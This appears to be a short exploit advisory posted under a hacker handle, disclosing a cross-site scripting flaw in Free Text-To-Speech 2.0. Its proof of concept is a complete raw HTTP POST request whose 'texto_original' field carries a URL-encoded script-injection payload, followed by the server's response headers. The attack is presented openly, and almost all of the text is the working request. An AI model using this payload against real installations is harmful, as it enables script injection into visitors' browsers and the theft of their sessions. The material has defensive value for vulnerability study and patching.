Free Text-To-Speech version 2.0 suffers from a cross site scripting vulnerability.
46b05a206f7a1a4cbb0efcc61e5ac4f5fab77e9774ef23670eef275f70851f35
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: Free Text-To-Speech System Cross Site Scripting
#[+] Date: 19-04-2015
#[+] Type: WebAPP
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
POC:
http://i.imgur.com/Pstv89u.png
http://127.0.0.1/nanbiquara_v2.0/
POST /nanbiquara_v2.0/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/nanbiquara_v2.0/
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
texto_original=%3Cscript%3Ealert%28%22XSS+TUNISIAN+CYBER%22%29%3B%3C%2Fscript%3E&voz=br1%2Fbr1
HTTP/1.1 200 OK
Date: Sun, 19 Apr 2015 20:12:59 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 830
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html